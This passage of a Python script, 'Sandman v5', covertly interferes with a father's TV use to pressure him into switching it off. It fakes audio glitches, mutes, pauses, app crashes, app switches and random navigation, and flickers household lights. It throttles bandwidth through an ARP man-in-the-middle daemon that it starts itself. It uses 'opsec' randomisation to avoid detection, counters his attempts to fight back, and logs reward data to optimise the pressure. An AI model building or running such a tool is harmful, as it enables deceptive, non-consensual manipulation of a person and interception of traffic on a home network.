            p_audio, p_video, p_crash = 0.35, 0.10, 0.08
            p_pause, p_ambi, p_nav = 0.15, 0.10, 0.08
            bw_target = 300

        # Back off if dad keeps fighting
        if fight_back_count >= 3 and elapsed < 60:
            log.info(f"  [{now_str}] 🕊️  Backing off — too much resistance. 15 min cooldown.")
            fight_back_count = 0
            time.sleep(900)
            continue

        # ─── Apply volume drop ────────────────────────────────────────────
        new_vol = max(3, current - vol_drop)
        actions = []

        if not dry_run:
            set_volume(tv_ip, new_vol)
        actions.append(f"vol {current}→{new_vol}")
        prev_volume = new_vol

        # Update watchdog target so it corrects any fight-backs
        if watchdog:
            watchdog.target_volume = new_vol
            if not watchdog._thread or not watchdog._thread.is_alive():
                watchdog.start()
                actions.append("watchdog ON")

        # ─── Apply bandwidth throttle ─────────────────────────────────────
        if throttler and not dry_run:
            throttler.set_bandwidth(bw_target)
            actions.append(f"bw→{bw_target}kbps")
        elif throttler:
            actions.append(f"bw→{bw_target}kbps")

        # ─── Schedule disruptions within this interval ────────────────────
        disruptions = []

        if random.random() < p_audio:
            dur = random.randint(200, 1200)
            delay = random.randint(30, max(60, int(interval * 0.4)))
            style = random.choice(["single"] * 3 + ["stutter"]) if phase <= 2 \
                else random.choice(["single", "stutter", "stutter", "fade"])
            disruptions.append(("audio", delay, dur, style))

        if random.random() < p_ambi:
            delay = random.randint(60, max(90, int(interval * 0.5)))
            disruptions.append(("ambilight", delay, 0, None))

        if random.random() < p_pause:
            delay = random.randint(45, max(90, int(interval * 0.6)))
            pause_dur = random.uniform(2, 7)  # seconds to stay paused
            disruptions.append(("pause", delay, int(pause_dur * 1000), None))

        if random.random() < p_nav:
            delay = random.randint(90, max(120, int(interval * 0.8)))
            nav_type = random.choice(["Back", "Home"])
            disruptions.append(("navigate", delay, 0, nav_type))

        if random.random() < p_crash:
            delay = random.randint(60, max(90, int(interval * 0.7)))
            disruptions.append(("crash", delay, 0, None))

        # Sort disruptions by delay
        disruptions.sort(key=lambda x: x[1])

        for d_type, d_delay, d_dur, d_style in disruptions:
            if d_type == "audio":
                actions.append(f"💥audio/{d_style}({d_dur}ms@+{d_delay}s)")
            elif d_type == "ambilight":
                actions.append(f"💡ambi(@+{d_delay}s)")
            elif d_type == "pause":
                actions.append(f"⏸️pause({d_dur/1000:.1f}s@+{d_delay}s)")
            elif d_type == "navigate":
                actions.append(f"🏠{d_style}(@+{d_delay}s)")
            elif d_type == "crash":
                actions.append(f"💀crash(@+{d_delay}s)")

        log.info(f"  [{now_str}] P{phase} | {' | '.join(actions)} | "
              f"next ~{interval // 60}m | +{int(elapsed)}m")

        # Execute disruptions with proper timing
        time_spent = 0
        for d_type, d_delay, d_dur, d_style in disruptions:
            sleep_for = d_delay - time_spent
            if sleep_for > 0:
                time.sleep(sleep_for)
                time_spent += sleep_for

            n = datetime.datetime.now().strftime("%H:%M:%S")
            if d_type == "audio" and not dry_run:
                audio_glitch(tv_ip, d_dur, style=d_style or "single")
                log.info(f"  [{n}]   💥 Audio {d_style}({d_dur}ms)")
            elif d_type == "ambilight" and not dry_run:
                ambilight_glitch(tv_ip)
                log.info(f"  [{n}]   💡 Ambilight off/on")
            elif d_type == "pause" and not dry_run:
                js_key(tv_ip, "Pause")
                time.sleep(d_dur / 1000)
                js_key(tv_ip, "Play")
                log.info(f"  [{n}]   ⏸️  Pause {d_dur/1000:.1f}s")
            elif d_type == "navigate" and not dry_run:
                js_key(tv_ip, d_style)
                log.info(f"  [{n}]   🏠 {d_style}")
            elif d_type == "crash" and not dry_run:
                netflix_crash(tv_ip)
                log.info(f"  [{n}]   💀 App crashed")

        # Program-aware disruption via JointSpace (runs between UPnP cycles)
        if not dry_run:
            program = detect_program(tv_ip)
            if program != 'off':
                program_disruption(tv_ip, program, phase)
                now_p = datetime.datetime.now().strftime("%H:%M:%S")
                if program != prev_program:
                    log.info(f"  [{now_p}]   📡 Program: {program}")
                    prev_program = program

        # Sleep remainder of interval
        remaining = interval - time_spent + random.randint(-30, 30)
        time.sleep(max(30, remaining))


# ─── Config-Driven Engine (v4) ───────────────────────────────────────────────

def load_config(path: str = None) -> dict:
    """Load sandman config from JSON file."""
    if path is None:
        path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "sandman_config.json")
    with open(path) as f:
        return json.load(f)


# ─── Attention Deficit Model ─────────────────────────────────────────────────

class AttentionModel:
    """Persistent attention deficit that grows with TV watching and recovers slowly.

    deficit: 0.0 = fresh, 1.0 = maxed out.
    Grows logarithmically while TV is on (first 30min low impact, then accelerates).
    Recovers via exponential decay while TV is off (>24hr for full recovery).
    Persisted to disk so it survives restarts.
    """

    def __init__(self, config: dict, state_file: str = "/share/sandman_state.json",
                 speed: float = 1.0, no_golden: bool = False):
        self.config = config.get("attention_model", {})
        self.state_file = state_file
        self.speed = speed
        self._cli_speed = speed  # remember CLI default for revert
        self.no_golden = no_golden

        # Model parameters from config
        self.base_rate = self.config.get("base_impact_rate", 0.003)
        self.recovery_rate = self.config.get("recovery_rate", 0.0005)
        self.sleep_mult = self.config.get("sleep_recovery_multiplier", 2.0)
        self.sleep_hours = self.config.get("sleep_hours", [0, 7])
        self.time_multipliers = self.config.get("time_multipliers", [])
        self.action_threshold = self.config.get("action_threshold", 0.15)

        # State
        self.deficit = 0.0
        self.last_updated = datetime.datetime.now().isoformat()
        self.session_start = None  # ISO string when current TV session began
        self.total_watch_today_min = 0.0
        self._today_date = datetime.datetime.now().strftime("%Y-%m-%d")

        self.load()

    def grow(self, dt_minutes: float, session_minutes: float):
        """Increase deficit while TV is on.

        Logarithmic: first 30min has low impact, then accelerates.
        dt_minutes: time elapsed since last update (real minutes, before speed).
        session_minutes: total minutes in current session so far.
        """
        dt = dt_minutes * self.speed
        rate_mult, _ = self.get_time_multiplier()
        impact = self.base_rate * math.log(1 + session_minutes / 30.0) * rate_mult
        self.deficit += impact * dt
        self.deficit = min(self.deficit, 1.0)
        self.total_watch_today_min += dt_minutes

    def recover(self, dt_minutes: float):
        """Decrease deficit while TV is off via exponential decay.

        Sleep hours (midnight-7am) get boosted recovery.
        """
        dt = dt_minutes * self.speed
        now = datetime.datetime.now()
        sleep_start, sleep_end = self.sleep_hours
        # Check if current hour is in sleep range
        if sleep_start <= sleep_end:
            is_sleep = sleep_start <= now.hour < sleep_end
        else:
            is_sleep = now.hour >= sleep_start or now.hour < sleep_end
        rest_mult = self.sleep_mult if is_sleep else 1.0
        self.deficit *= math.exp(-self.recovery_rate * dt * rest_mult)
        # Clamp very small values to zero
        if self.deficit < 0.001:
            self.deficit = 0.0

    def get_time_multiplier(self) -> tuple:
        """Returns (rate_multiplier, actions_allowed) based on current time.

        During golden period: returns (0.3, False).
        """
        now = datetime.datetime.now()
        now_mins = now.hour * 60 + now.minute

        for slot in self.time_multipliers:
            start_h, start_m = map(int, slot["start"].split(":"))
            end_h, end_m = map(int, slot["end"].split(":"))
            start_mins = start_h * 60 + start_m
            end_mins = end_h * 60 + end_m

            # Handle midnight crossing
            if end_mins <= start_mins:
                in_range = now_mins >= start_mins or now_mins < end_mins
            else:
                in_range = start_mins <= now_mins < end_mins

            if in_range:
                no_actions = slot.get("no_actions", False)
                if self.no_golden and no_actions:
                    # Golden period disabled — treat as normal with rate 1.0
                    return (1.0, True)
                return (slot["rate"], not no_actions)

        # Default: normal rate, actions allowed
        return (1.0, True)

    def get_deficit(self) -> float:
        """Returns current deficit float 0-1."""
        return self.deficit

    def set_deficit(self, value: float):
        """Set deficit directly (for test mode injection)."""
        self.deficit = max(0.0, min(1.0, value))

    def check_external_update(self):
        """Check if state or speed files were modified externally (e.g. by Telegram bot)."""
        # Check deficit
        try:
            with open(self.state_file) as f:
                state = json.load(f)
            file_deficit = state.get("deficit", self.deficit)
            if abs(file_deficit - self.deficit) > 0.01:
                log.info(f"  External deficit change: {self.deficit:.3f} → {file_deficit:.3f}")
                self.deficit = file_deficit
        except Exception:
            pass
        # Check speed override
        try:
            with open("/share/sandman_speed.json") as f:
                speed_data = json.load(f)
            new_speed = speed_data.get("speed", 1.0)
            if new_speed != self.speed:
                log.info(f"  Speed changed: {self.speed}x → {new_speed}x")
                self.speed = new_speed
        except FileNotFoundError:
            if self.speed != self._cli_speed:
                self.speed = self._cli_speed  # revert to CLI default if file deleted
        except Exception:
            pass

    def save(self):
        """Persist state to JSON file."""
        state = {
            "deficit": round(self.deficit, 6),
            "last_updated": datetime.datetime.now().isoformat(),
            "session_start": self.session_start,
            "total_watch_today_min": round(self.total_watch_today_min, 1),
            "today_date": self._today_date,
        }
        try:
            tmp = self.state_file + ".tmp"
            with open(tmp, "w") as f:
                json.dump(state, f, indent=2)
            os.replace(tmp, self.state_file)
        except Exception as e:
            log.warning(f"  Failed to save state: {e}")

    def load(self):
        """Load state from JSON file, with sensible defaults if missing."""
        try:
            with open(self.state_file) as f:
                state = json.load(f)
            self.deficit = state.get("deficit", 0.0)
            self.last_updated = state.get("last_updated", datetime.datetime.now().isoformat())
            self.session_start = state.get("session_start", None)

            # Reset daily total if it's a new day
            saved_date = state.get("today_date", "")
            today = datetime.datetime.now().strftime("%Y-%m-%d")
            if saved_date == today:
                self.total_watch_today_min = state.get("total_watch_today_min", 0.0)
            else:
                self.total_watch_today_min = 0.0
                self._today_date = today

            # Apply recovery for time elapsed since last update
            try:
                last = datetime.datetime.fromisoformat(self.last_updated)
                elapsed_min = (datetime.datetime.now() - last).total_seconds() / 60.0
                if elapsed_min > 0 and self.session_start is None:
                    # TV was off — apply recovery for elapsed time
                    self.recover(elapsed_min)
                    log.info(f"  Applied {elapsed_min:.0f}min offline recovery, deficit now {self.deficit:.3f}")
            except Exception:
                pass

            log.info(f"  Loaded state: deficit={self.deficit:.3f}, "
                     f"today_watch={self.total_watch_today_min:.0f}min")
        except FileNotFoundError:
            log.info(f"  No state file — starting fresh (deficit=0)")
        except Exception as e:
            log.warning(f"  Failed to load state: {e} — starting fresh")
            self.deficit = 0.0

    def is_action_eligible(self, action_cfg: dict) -> bool:
        """Check if current deficit >= action's min_deficit threshold."""
        min_deficit = action_cfg.get("min_deficit", 0.0)
        return self.deficit >= min_deficit

    def get_interval(self, config: dict) -> float:
        """Scale interval with deficit: high deficit = short intervals."""
        ival = config.get("interval", {})
        min_s = ival.get("min_seconds", 20)
        max_s = ival.get("max_seconds", 480)
        # At deficit 0: use max interval. At deficit 1: use min interval.
        target = max_s - self.deficit * (max_s - min_s)
        # Add randomness: +/-30%
        jitter = target * random.uniform(-0.3, 0.3)
        return max(min_s, target + jitter)

    def log_daily(self, watch_minutes: float):
        """Track daily watch totals. Resets when the date changes."""
        today = datetime.datetime.now().strftime("%Y-%m-%d")
        if today != self._today_date:
            self._today_date = today
            self.total_watch_today_min = 0.0


# ─── RL Logging ──────────────────────────────────────────────────────────────

RL_LOG_PATH = "/share/sandman_rl_log.jsonl"

# Pending reward entries: list of (file_offset, timestamp) for actions awaiting outcome
_rl_pending: list = []


def rl_log_action(deficit: float, session_min: float, action_name: str, app: str = None):
    """Log an action to the RL log file. Returns the file offset for later reward fill-in."""
    now = datetime.datetime.now()
    entry = {
        "ts": now.isoformat(),
        "deficit": round(deficit, 4),
        "time": now.strftime("%H:%M"),
        "app": app,
        "session_min": round(session_min, 1),
        "action": action_name,
        "tv_off_within_5m": None,
        "tv_off_within_15m": None,
    }
    try:
        with open(RL_LOG_PATH, "a") as f:
            offset = f.tell()
            f.write(json.dumps(entry) + "\n")
        _rl_pending.append((offset, now))
        # Prune old pending entries (>20 min)
        cutoff = now - datetime.timedelta(minutes=20)
        _rl_pending[:] = [(o, t) for o, t in _rl_pending if t > cutoff]
        return offset
    except Exception as e:
        log.debug(f"  RL log write failed: {e}")
        return None


def rl_fill_rewards(tv_off_time: datetime.datetime):
    """When TV turns off, fill in tv_off_within_Xm for recent pending actions."""
    if not _rl_pending:
        return
    try:
        # Read all lines, update matching ones, rewrite
        with open(RL_LOG_PATH, "r") as f:
            lines = f.readlines()

        updated = False
        for offset, action_time in _rl_pending:
            delta = (tv_off_time - action_time).total_seconds() / 60.0
            if delta < 0:
                continue
            within_5 = delta <= 5.0
            within_15 = delta <= 15.0
            # Find the line by scanning for matching timestamp
            ts_str = action_time.isoformat()
            for i, line in enumerate(lines):
                if ts_str in line:
                    try:
                        entry = json.loads(line)
                        entry["tv_off_within_5m"] = within_5
                        entry["tv_off_within_15m"] = within_15
                        lines[i] = json.dumps(entry) + "\n"
                        updated = True
                    except json.JSONDecodeError:
                        pass
                    break

        if updated:
            with open(RL_LOG_PATH, "w") as f:
                f.writelines(lines)

        _rl_pending.clear()
    except Exception as e:
        log.debug(f"  RL reward fill failed: {e}")


# ─── Daily Personality Filter ────────────────────────────────────────────────

def _daily_action_filter(config: dict) -> set:
    """Each day, randomly disable some action types for variety."""
    opsec = config.get("opsec", {})
    if not opsec.get("daily_personality", False):
        return set()  # all actions enabled
    today = datetime.datetime.now().strftime("%Y-%m-%d")
    rng = random.Random(today + "personality")
    all_actions = list(config["actions"].keys())
    # Disable 20-40% of actions today
    num_disabled = rng.randint(len(all_actions) // 5, len(all_actions) * 2 // 5)
    disabled = set(rng.sample(all_actions, min(num_disabled, len(all_actions) - 3)))
    # Never disable volume_drop_big and audio_stutter_long (too essential)
    disabled.discard("volume_drop_big")
    disabled.discard("audio_stutter_long")
    return disabled


def pick_action_deficit(deficit: float, config: dict, disabled_today: set) -> tuple:
    """Pick a random action weighted by base weight, filtered by deficit threshold.
    Returns (action_name, action_config) or (None, None)."""
    now = datetime.datetime.now()
    cur_minutes = now.hour * 60 + now.minute
    eligible = []
    weights = []
    for name, acfg in config["actions"].items():
        if name in disabled_today:
            continue
        min_deficit = acfg.get("min_deficit", 0.0)
        if deficit < min_deficit:
            continue
        # Per-action permissible hours filter
        ph = acfg.get("permissible_hours")
        if ph and ph.get("enabled"):
            try:
                sh, sm = map(int, ph["start"].split(":"))
                eh, em = map(int, ph["end"].split(":"))
                start_m = sh * 60 + sm
                end_m = eh * 60 + em
                if start_m <= end_m:
                    if not (start_m <= cur_minutes < end_m):
                        continue
                else:  # wraps midnight e.g. 22:00-06:00
                    if not (cur_minutes >= start_m or cur_minutes < end_m):
                        continue
            except (ValueError, KeyError):
                pass  # malformed — allow action
        eligible.append((name, acfg))
        weights.append(acfg.get("weight", 10))
    if not eligible:
        return None, None
    return random.choices(eligible, weights=weights, k=1)[0]


def execute_action(tv_ip: str, action_name: str, action_cfg: dict, dry_run: bool = False, severity_level: float = 0.5, deficit: float = 0.5):
    """Execute a single sandman action."""
    params = action_cfg.get("params", {})
    n = datetime.datetime.now().strftime("%H:%M:%S")

    if dry_run:
        log.info(f"  [{n}] [DRY] {action_name}")
        return

    if action_name == "volume_nudge":
        vol = get_volume(tv_ip)
        if vol is not None:
            new_vol = max(3, vol - params.get("drop", 1))
            set_volume(tv_ip, new_vol)
            log.info(f"  [{n}]   📉 Vol {vol}→{new_vol}")

    elif action_name in ("volume_drop", "volume_drop_big"):
        vol = get_volume(tv_ip)
        if vol is not None:
            drop = random.randint(params.get("drop_min", 2), params.get("drop_max", 4))
            new_vol = max(0, vol - drop)
            set_volume(tv_ip, new_vol)
            log.info(f"  [{n}]   📉 Vol {vol}→{new_vol} (-{drop})")

    elif action_name == "full_mute":
        set_mute(tv_ip, True)
        log.info(f"  [{n}]   🔇 FULL MUTE (stays muted)")

    elif action_name == "audio_stutter_long":
        repeats = random.randint(params.get("repeats_min", 5), params.get("repeats_max", 8))
        for _ in range(repeats):
            set_mute(tv_ip, True)
            time.sleep(random.uniform(0.2, 0.5))
            set_mute(tv_ip, False)
            time.sleep(random.uniform(0.1, 0.3))
        log.info(f"  [{n}]   💥 Long stutter ({repeats}× over ~{repeats}s)")

    elif action_name == "overlay_controls":
        # In YouTube/Netflix, Down or Right brings up the control overlay
        key_choice = random.choice(["CursorDown", "CursorDown", "CursorRight", "CursorUp"])
        js_key(tv_ip, key_choice)
        # Press a couple more to make the overlay persistent
        time.sleep(0.5)
        js_key(tv_ip, random.choice(["CursorLeft", "CursorRight"]))
        log.info(f"  [{n}]   📺 Overlay controls ({key_choice})")

    elif action_name == "pause_long":
        pause_s = random.uniform(params.get("pause_min_s", 10), params.get("pause_max_s", 30))
        js_key(tv_ip, "Pause")
        log.info(f"  [{n}]   ⏸️  LONG PAUSE ({pause_s:.0f}s — dad must act)")
        # Don't auto-resume — let dad deal with it

    elif action_name == "back_spam":
        presses = random.randint(params.get("presses_min", 3), params.get("presses_max", 5))
        for _ in range(presses):
            js_key(tv_ip, "Back")
            time.sleep(0.3)
        log.info(f"  [{n}]   ⬅️  Back spam ×{presses}")

    elif action_name == "audio_blip":
        dur = random.randint(params.get("duration_min_ms", 200), params.get("duration_max_ms", 500))
        audio_glitch(tv_ip, dur, "single")
        log.info(f"  [{n}]   💥 Audio blip ({dur}ms)")

    elif action_name == "audio_stutter":
        audio_glitch(tv_ip, 800, "stutter")
        log.info(f"  [{n}]   💥 Audio stutter")

    elif action_name == "audio_fade":
        dur = random.randint(params.get("duration_min_ms", 800), params.get("duration_max_ms", 2000))
        audio_glitch(tv_ip, dur, "fade")
        log.info(f"  [{n}]   💥 Audio fade ({dur}ms)")

    elif action_name == "pause_play":
        pause_s = random.uniform(params.get("pause_min_s", 2), params.get("pause_max_s", 7))
        js_key(tv_ip, "Pause")
        time.sleep(pause_s)
        js_key(tv_ip, "Play")
        log.info(f"  [{n}]   ⏸️  Pause {pause_s:.1f}s")

    elif action_name == "ambilight_flicker":
        ambilight_glitch(tv_ip, params.get("off_duration_s", 3))
        log.info(f"  [{n}]   💡 Ambilight flicker")

    elif action_name == "channel_nudge":
        js_key(tv_ip, "ChannelStepUp")
        delay = random.uniform(params.get("delay_min_s", 3), params.get("delay_max_s", 10))
        time.sleep(delay)
        js_key(tv_ip, "ChannelStepDown")
        log.info(f"  [{n}]   📺 Channel flip ({delay:.0f}s)")

    elif action_name == "back":
        js_key(tv_ip, "Back")
        log.info(f"  [{n}]   ⬅️  Back")

    elif action_name == "home":
        js_key(tv_ip, "Home")
        log.info(f"  [{n}]   🏠 Home")

    elif action_name == "navigate_random":
        nav_keys = ["CursorUp", "CursorDown", "CursorLeft", "CursorRight", "Confirm",
                    "Back", "FastForward", "Rewind"]
        count = random.randint(8, 12)
        desc_parts = []
        for _ in range(count):
            key_name = random.choice(nav_keys)
            js_key(tv_ip, key_name)
            time.sleep(random.uniform(0.2, 0.5))
            desc_parts.append(key_name)
        log.info(f"  [{n}]   🎲 Random nav ({count}): {' → '.join(desc_parts)}")

    elif action_name == "throttle":
        bw_min = params.get("bandwidth_min_kbps", 800)
        bw_max = params.get("bandwidth_max_kbps", 2000)
        dur_min = params.get("duration_s_min", 300)
        dur_max = params.get("duration_s_max", 1200)
        # Scale with deficit: higher deficit = lower bandwidth + longer duration
        deficit_factor = min(1.0, deficit / 0.7)
        bw = max(500, int(bw_max - (bw_max - bw_min) * deficit_factor))
        duration = dur_min + (dur_max - dur_min) * deficit_factor

        # Check if MITM daemon is running (required for throttle)
        mitm_running = os.path.exists("/share/arp_mitm_state.json")
        if not mitm_running:
            # Try to start it
            try:
                subprocess.Popen(["python3", "/share/arp_mitm.py"],
                                 start_new_session=True,
                                 stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
                time.sleep(5)
                mitm_running = os.path.exists("/share/arp_mitm_state.json")
            except Exception:
                pass

        if not mitm_running:
            log.warning(f"  [{n}]   🌐 MITM not running — skipping throttle")
        else:
            try:
                tv_control.throttle_apply(tv_ip=tv_ip, bandwidth_kbps=bw)
                log.info(f"  [{n}]   🌐 Throttle {bw}kbps for {duration/60:.0f}min")
                time.sleep(duration)
            except Exception as e:
                log.warning(f"  [{n}]   🌐 Throttle error: {e}")
            finally:
                tv_control.throttle_remove()
                log.info(f"  [{n}]   🌐 Throttle ended")

    elif action_name == "screensaver":
        js_key(tv_ip, "Home")
        time.sleep(3)
        js_key(tv_ip, "Back")
        log.info(f"  [{n}]   🌙 Screensaver triggered")

    elif action_name.startswith("sound_"):
        import tv_control as _tc
        sound_file = params.get("file", "knock_2.mp3")
        _tc.speaker_play_sound(sound_file)
        log.info(f"  [{n}]   🔊 Speaker: {sound_file}")

    elif action_name == "app_switch":
        import tv_control as _tc
        apps = [
            ("com.netflix.ninja", "Netflix"),
            ("com.google.android.youtube.tv", "YouTube"),
            ("com.apple.atve.androidtv.appletv", "Apple TV+"),
            ("com.amazon.amazonvideo.livingroom", "Prime Video"),
            ("org.droidtv.playtv", "Live TV"),
        ]
        # Detect current app, pick a different one
        try:
            pkg_now, _, _ = _tc.adb_get_current_app()
        except Exception:
            pkg_now = ""
        other_apps = [a for a in apps if a[0] != pkg_now]
        if other_apps:
            pkg, name = random.choice(other_apps)
            _tc.adb_launch_app(pkg)
            log.info(f"  [{n}]   🔀 App switch → {name}")

    elif action_name.startswith("flicker_"):
        flicker_map = {
            "flicker_toilet_light": ("switch.magic_switch_s1e_595a_kitchen_switch_2", "🚽"),
            "flicker_tv_light": ("switch.magic_switch_s1e_bb55_switch_3", "💡"),
            "flicker_laundry_light": ("switch.magic_switch_s1e_595a_kitchen_switch_1", "🧺"),
            "flicker_kitchen_light": ("switch.sonoff_10020b0c7c_2", "🍳"),
        }
        entity, label = flicker_map.get(action_name, (None, "?"))
        if entity:
            duration = random.uniform(0.1, 10.0)
            _ha_switch_flicker(entity, duration)
            log.info(f"  [{n}]   {label} Light flicker ({duration:.1f}s)")

    elif action_name == "power_off":
        js_key(tv_ip, "Standby")
        log.info(f"  [{n}]   ⚡ POWER OFF")


def _ha_switch_flicker(entity_id: str, duration: float):
    """Toggle a HA switch for `duration` seconds then restore original state."""
    tv_control.ha_switch_flicker(entity_id, duration)


def run_v4(tv_ip_arg: str = "auto", config_path: str = None, dry_run: bool = False,
           inject_deficit: float = None, speed: float = 1.0, no_golden: bool = False):
    """Attention-deficit-driven sandman engine. Runs continuously.

    The deficit grows while the TV is on and recovers slowly while off.
    Actions are selected based on deficit level, not grace periods or severity curves.
    """
    config = load_config(config_path)
    tv_ip = tv_ip_arg
    opsec = config.get("opsec", {})

    # Initialize attention model
    model = AttentionModel(config, speed=speed, no_golden=no_golden)
    if inject_deficit is not None:
        model.set_deficit(inject_deficit)
        log.info(f"  Injected starting deficit: {inject_deficit:.2f}")

    # Daily personality -- which actions are disabled today
    disabled_today = _daily_action_filter(config)

    if tv_ip == "auto" or tv_ip is None:
        log.info("  Auto-discovering TV via SSDP...")
        tv_ip = discover_tv()
        if tv_ip:
            log.info(f"  Found TV at {tv_ip}")
        else:
            log.warning(" TV not found -- will retry each cycle")

    log.info(f"Sandman v5 -- attention deficit engine")
    log.info(f"   Target: {tv_ip or 'auto-discover'}")
    log.info(f"   Deficit: {model.get_deficit():.3f}")
    log.info(f"   Speed: {speed}x")
    log.info(f"   Golden period: {'disabled' if no_golden else 'enabled'}")
    log.info(f"   Interval: {config['interval']['min_seconds']}s - {config['interval']['max_seconds']}s")
    log.info(f"   Actions: {len(config['actions'])} configured, {len(disabled_today)} disabled today")
    if disabled_today:
        log.info(f"   Disabled today: {', '.join(disabled_today)}")
    log.info(f"   Skip probability: {opsec.get('skip_probability', 0):.0%}")
    max_act = opsec.get('max_actions_per_session', 0)
    log.info(f"   Max actions/session: {'unlimited' if max_act == 0 else max_act}")
    log.info(f"   Dry run: {dry_run}")

    def cleanup(sig=None, frame=None):
        log.info("Sandman shutting down. Saving state...")
        model.save()
        sys.exit(0)

    signal.signal(signal.SIGINT, cleanup)
    signal.signal(signal.SIGTERM, cleanup)
    signal.signal(signal.SIGHUP, signal.SIG_IGN)  # survive SSH disconnect

    tv_was_on = False
    session_start_time = None  # datetime when current session started
    last_update = datetime.datetime.now()
    last_save = datetime.datetime.now()
    action_count = 0

    while True:
        now = datetime.datetime.now()
        dt_minutes = (now - last_update).total_seconds() / 60.0
        last_update = now

        # Check for external deficit changes (e.g. Telegram /deficit command)
        model.check_external_update()

        # Hot-reload config if it changed (e.g. from Mini App)
        try:
            cfg_mtime = os.path.getmtime(config_path or "sandman_config.json")
            if not hasattr(run_v4, '_cfg_mtime') or cfg_mtime != run_v4._cfg_mtime:
                if hasattr(run_v4, '_cfg_mtime'):
                    config = load_config(config_path)
                    opsec = config.get("opsec", {})
                    log.info("  Config hot-reloaded")
                run_v4._cfg_mtime = cfg_mtime
        except Exception:
            pass

        # Discover TV if needed
        if tv_ip is None or get_volume(tv_ip) is None:
            new_ip = discover_tv(timeout=5)
            if new_ip and new_ip != tv_ip:
                tv_ip = new_ip
                now_str = now.strftime("%H:%M:%S")
                log.info(f"  [{now_str}] TV at {tv_ip}")

        # Check if TV is on
        vol = None if tv_ip is None else get_volume(tv_ip)
        now_str = now.strftime("%H:%M:%S")

        if vol is None:
            # TV is off or unreachable
            if tv_was_on:
                log.info(f"  [{now_str}] TV off -- deficit={model.get_deficit():.3f}, "
                         f"today={model.total_watch_today_min:.0f}min")
                # Fill RL rewards for recent actions
                rl_fill_rewards(now)
                model.session_start = None
                model.save()
                session_start_time = None
                action_count = 0

            tv_was_on = False
            # Apply recovery while TV is off
            if dt_minutes > 0:
                model.recover(dt_minutes)

            # Save state periodically
            if (now - last_save).total_seconds() >= 60:
                model.save()
                last_save = now

            time.sleep(60)
            continue

        # TV is on
        if not tv_was_on:
            # TV just turned on
            session_start_time = now
            model.session_start = now.isoformat()
            log.info(f"  [{now_str}] TV on -- deficit={model.get_deficit():.3f}")
        tv_was_on = True

        # Calculate session duration
        session_minutes = (now - session_start_time).total_seconds() / 60.0 if session_start_time else 0

        # Grow deficit
        if dt_minutes > 0:
            model.grow(dt_minutes, session_minutes)
            model.log_daily(session_minutes)

        deficit = model.get_deficit()

        # Save state periodically (every 60s)
        if (now - last_save).total_seconds() >= 60:
            model.save()
            last_save = now

        # Check golden period -- grow deficit (at reduced rate, already handled in grow())
        # but skip actions
        _, actions_allowed = model.get_time_multiplier()
        if not actions_allowed:
            log.debug(f"Golden period -- deficit={deficit:.3f}, no actions")
            time.sleep(30)
            continue

        # Below action threshold -- just monitor
        if deficit < model.action_threshold:
            log.debug(f"Below threshold -- deficit={deficit:.3f} < {model.action_threshold}")
            time.sleep(30)
            continue

        # Opsec: random skip
        if random.random() < opsec.get("skip_probability", 0):
            interval = model.get_interval(config)
            time.sleep(interval)
            continue

        # Opsec: max actions per session
        max_actions = opsec.get("max_actions_per_session", 0)
        if max_actions > 0 and action_count >= max_actions:
            log.info(f"  [{now_str}] Max actions ({max_actions}) reached. Going quiet.")
            time.sleep(300)
            continue

        # Pick and execute action
        action_name, action_cfg = pick_action_deficit(deficit, config, disabled_today)

        if action_name:
            log.info(f"  [{now_str}] deficit={deficit:.3f} session={session_minutes:.0f}m | {action_name}")
            execute_action(tv_ip, action_name, action_cfg, dry_run,
                           severity_level=deficit, deficit=deficit)
            action_count += 1

            # RL logging
            app = None
            try:
                app = detect_program(tv_ip)
            except Exception:
                pass
            rl_log_action(deficit, session_minutes, action_name, app=app)

        # Calculate interval -- scales with deficit
        interval = model.get_interval(config)
        time.sleep(interval)


def main():
    p = argparse.ArgumentParser(description="Sandman v5 -- attention deficit TV sleep pressure")
    p.add_argument("--tv", default="auto", help="TV IP address (or 'auto' for SSDP discovery)")
    p.add_argument("--dry-run", action="store_true", help="Print actions only, don't send")
    p.add_argument("--config", default=None, help="Path to config JSON (default: sandman_config.json)")
    p.add_argument("--log-dir", default=None, help="Directory for log files (default: same as script)")
    p.add_argument("--deficit", type=float, default=None,
                   help="Inject starting deficit (0.0-1.0) for testing")
    p.add_argument("--speed", type=float, default=1.0,
                   help="Time multiplier for testing (e.g. --speed 10 = 10x faster)")
    p.add_argument("--no-golden", action="store_true",
                   help="Disable golden period (actions allowed during 10-10:30pm)")
    args = p.parse_args()

    setup_logging(log_dir=args.log_dir)
    run_v4(tv_ip_arg=args.tv, config_path=args.config, dry_run=args.dry_run,
           inject_deficit=args.deficit, speed=args.speed, no_golden=args.no_golden)


if __name__ == "__main__":
    main()
